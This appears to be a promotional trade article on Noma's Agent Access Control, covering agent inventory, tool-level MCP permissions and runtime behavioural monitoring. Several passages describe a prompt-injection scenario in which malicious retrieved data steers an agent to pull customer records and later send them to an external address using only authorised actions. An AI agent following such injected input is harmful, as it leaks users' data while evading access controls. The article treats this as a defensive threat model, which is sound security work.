Noma’s Agent Access Control, launched this week as an addition to the company’s enterprise AI and agent security platform, addresses all three dimensions of that governance gap in sequence: discover what is running, establish attributable identity, define and enforce policy at the tool level, and then layer behavioral monitoring on top to catch what policy definitions alone cannot anticipate.

The next generation of cyberattacks will increasingly target trust relationships rather than technical vulnerabilities alone. As AI agents gain access to enterprise systems, attackers are finding new ways to manipulate identities, permissions, and authorized workflows to achieve malicious outcomes without triggering traditional security controls.

Download Consltek’s Deepfake to Breach: SMB Playbook for Identity Attacks to learn how AI-powered impersonation, credential abuse, and trust-based attacks are evolving—and what security leaders can do to strengthen identity governance before autonomous systems expand the attack surface further.

Why Access Policy Alone Is Not Sufficient Governance for AI Agents

The security intuition carried over from traditional identity and access management into agentic environments is that defining what an agent is authorized to do constitutes the primary governance control. That intuition is partially correct and partially dangerous as applied to AI agents, for a reason that distinguishes agentic systems from every prior class of enterprise software.

Traditional service accounts and application integrations execute within the scope of their authorization in ways that are fully determined by their code. A service account authorized to read customer records reads customer records. It does not reason about whether it should also export those records to a third-party endpoint based on the content of an instruction it received at runtime. The authorization boundary and the behavioral boundary are effectively the same.

AI agents sever that equivalence. An agent authorized to read customer records and send communications on behalf of users can, if it encounters a malicious prompt injection in the data it retrieves, be redirected to combine those two authorized capabilities in a sequence that accomplishes data exfiltration while never technically exceeding its stated permissions. The agent misused its legitimately granted authorization. No access policy defined at configuration time anticipates every combination of authorized actions that a sufficiently adversarial runtime input can construct.

Noma CEO Niv Braun‘s articulation of this distinction, that agents are influenced by everything they encounter at runtime, including prompts, tool responses, and retrieved data, and that a single malicious input can redirect behavior in ways no access policy anticipates, describes the specific threat model that makes runtime behavioral monitoring an architectural requirement rather than a supplementary feature for mature programs.

The two-layer governance architecture Noma has built reflects this reality directly. Layer one defines the authorization boundary. Layer two verifies at runtime that agent behavior remains within the intent that authorization was designed to express, not just within the letter of what each action was permitted to do.

The Inventory Problem and Why It Has to Be Solved First

Security teams cannot govern what they cannot see, and the inventory challenge for enterprise AI agents is more complex than the equivalent challenge for traditional software assets.

Traditional software assets are deployed through change management processes that create records. Cloud infrastructure is provisioned through APIs that log creation events. Both categories of assets are, at least in principle, discoverable through the change and provisioning records that enterprise asset management programs track.

AI agents do not uniformly enter enterprise environments through governed deployment channels. Developer teams building agentic applications connect to MCP servers and configure agent toolsets in the course of normal development work. Tools like Claude Desktop, Cursor, and similar development environments make it straightforward to connect agents to external services without engaging the procurement or security review processes that formal software deployment requires. An enterprise that has deployed a formal AI governance framework for its centrally managed AI initiatives may simultaneously have hundreds of developer-configured agents operating outside that framework’s visibility.

Noma Agent Access Control’s automated registry addresses this discovery challenge by identifying every agent and connected MCP server across the enterprise environment and building a continuous, real-time inventory with risk context attached. The registry surfaces what each MCP server exposes, which agents connect to it, and where each connection stands against current security policies, without requiring weeks of manual assessment work to establish an initial baseline.

The risk context attachment is operationally significant beyond the discovery function. An inventory that lists agents and connections without indicating which ones present elevated risk against current policies requires human analysis to prioritize. A registry that surfaces risk posture alongside inventory allows security teams to direct attention immediately toward the highest-priority items rather than working through a flat list.

Tool-Level Granularity and Why Coarse Controls Create Unnecessary Friction

The governance model in Noma Agent Access Control reflects an architectural choice that has direct implications for how enterprise security teams can manage the tension between AI deployment velocity and security control requirements.

Conventional access control approaches applied to MCP servers treat the server as the unit of authorization. An agent either has access to a server or it does not. That granularity is operationally adequate for server types with uniform risk profiles, but it creates an unacceptable binary for the mixed-risk MCP servers that enterprise environments commonly deploy. A single MCP server may expose a read-only file access tool alongside a tool that can delete records, send external communications, or modify system configurations. Blocking access to the server to prevent exposure to the high-risk tools also blocks access to the legitimate low-risk tools that development workflows depend on.

Tool-level control resolves that tension by allowing security teams to approve or block individual tools within a server rather than making all-or-nothing server-level decisions. The policy granularity extends further to agent type, user, team, and deployment environment, which means that the same tool can be approved for a production agent with a defined, audited purpose while remaining blocked for experimental agents in developer environments without requiring separate server deployments to enforce that distinction.

The three-state governance model, Approved, Requires Review, and Blocked, with Approved connections operating with zero friction and Blocked connections prevented automatically without manual intervention at each occurrence, reflects a practical understanding of how security controls need to function in environments where the volume of agents and tool connections exceeds what case-by-case human review can manage.

The Requires Review queue with full risk context attached is the critical middle tier. It creates a structured path for the ambiguous cases that binary approved/blocked models handle poorly, allowing security teams to make informed decisions against a defined risk context rather than either blocking by default on everything uncertain or approving by default to avoid deployment friction.

Behavioral Chain Monitoring and the Multi-Step Exfiltration Problem

The runtime enforcement layer that Noma’s AI Detection and Response capability provides addresses the specific threat pattern that access policy definitions structurally cannot anticipate: the multi-step action sequence where each step is within authorized scope, but the complete sequence accomplishes something the authorization was never intended to permit.

The example Noma describes is concrete and worth examining for what it reveals about the detection challenge. An agent that retrieves customer records and then, three steps later, sends a summary to an external address may have been technically authorized to perform both actions. Each step, evaluated independently against the agent’s policy, appears compliant. The exfiltration is only visible in the sequence: retrieval followed by external transmission of the retrieved content. No access policy written against individual actions can flag that sequence without the ability to evaluate the full behavioral chain.

Behavioral chain monitoring that evaluates the complete sequence of prompts, tool calls, data access events, and actions taken within an agent session creates the detection surface for that threat pattern. The integration between Noma’s AI-DR capability and Agent Access Control closes the context gap that would otherwise force the detection layer to operate without the authorization baseline it needs to distinguish authorized sequences from malicious ones.

An agent that retrieves customer records is either authorized to do so or it is not. The AI-DR layer needs to know which is the case to evaluate whether the retrieval is itself suspicious or whether the suspicion arises from what the agent does with the retrieved data in subsequent steps. Shared context between the access control layer and the detection layer, where both operate against the same agent identity and policy definitions, is what makes that evaluation possible without requiring security analysts to manually correlate access control records with behavioral logs.

Security Architecture Implications for Enterprise AI Programs

Enterprise security architecture teams evaluating their AI governance frameworks should interpret Noma’s launch as a signal of where the agentic security category is maturing, and assess their current posture against the capability gaps it identifies.

The sequence of governance requirements that Agent Access Control addresses, inventory before policy before enforcement, maps directly onto the maturity stages that enterprise AI security programs need to progress through. Organizations that have not yet solved the inventory problem cannot have meaningful policy discussions because they do not know what they are setting policy for. Organizations that have established basic inventory but have not implemented attributable agent identity cannot enforce policy consistently, because they cannot reliably associate actions with the agents that took them. Organizations that have defined and enforced access policy but have not layered behavioral monitoring on top remain exposed to the multi-step attack patterns that policy definitions alone do not catch.

That maturity framing has direct budget implications. The organizations furthest behind on the inventory and identity dimensions face the largest and most immediate exposure, and their path to adequate governance requires solving earlier-stage problems before the later-stage ones become tractable. The organizations that have made meaningful progress on inventory and access policy governance are the most immediate qualified buyers for behavioral monitoring capabilities, because they have the foundation that makes behavioral monitoring analytically effective.

Where Enterprise AI Security Investment Is Concentrating

The agentic AI security category has moved from early-stage awareness to active enterprise evaluation in a compressed timeframe that reflects the speed of AI agent deployment in enterprise environments. Security vendor categories that were not specifically designed for agentic threat models twelve months ago are now under pressure to demonstrate agentic security coverage, and the gap between vendors that have built purpose-designed agentic governance capabilities and those that have extended existing capabilities to cover agent use cases is becoming visible in enterprise evaluations.

The MCP server governance requirement is emerging as a specific evaluation criterion in enterprise AI security assessments as MCP adoption accelerates beyond developer tools into production enterprise agent deployments. Organizations standardizing on MCP as their agent connectivity protocol need governance tooling that understands MCP’s access and authorization architecture natively, rather than treating it as a generic API endpoint.

Buyer Signals Worth Tracking

Security engineering and architecture teams actively inventorying their enterprise agent deployments represent the earliest qualified buyer cohort, because the inventory problem is the admission that governance is not currently adequate, and solving the inventory problem is the first step toward everything that follows. Organizations that have already deployed formal AI governance programs for centrally managed AI initiatives but have not yet extended that governance to developer-configured agents and MCP connections are the most immediate pipeline segment, because they have already made the organizational investment in AI security governance and face the known gap of ungoverned developer-configured agents.

The DevSecOps and platform engineering teams responsible for developer tool governance are a parallel buyer segment that is often underweighted in AI security marketing but represents meaningful budget influence over the agent and MCP server governance decisions that are currently being made informally in developer environments.

The Governance Debt That Is Accumulating in Ungoverned Agent Environments

Enterprise organizations that have allowed AI agent deployment to outpace their governance frameworks are accumulating security and compliance debt at a rate that compounds with each additional agent deployment. Every agent running without attributable identity, every MCP connection operating without policy definition, and every tool invocation occurring outside behavioral monitoring coverage represents an unquantified risk exposure that grows as the agent inventory expands.

The organizations that establish inventory visibility, attributable identity, and tool-level access control now are not simply improving their current security posture. They are stopping the accumulation of governance debt before it reaches a scale where the remediation work required to bring the full agent inventory into compliance becomes a major program in itself rather than an incremental governance improvement.

Noma’s architecture, building from automated discovery through identity assignment through policy enforcement through behavioral monitoring in a single integrated platform, provides a path from ungoverned agent sprawl to comprehensive governance without requiring organizations to solve each layer with separate tools and then manage the integration between them. For enterprise security teams that are currently behind on AI agent governance, the compounding nature of the debt makes the timing of that remediation more consequential than it might appear in a more static risk environment.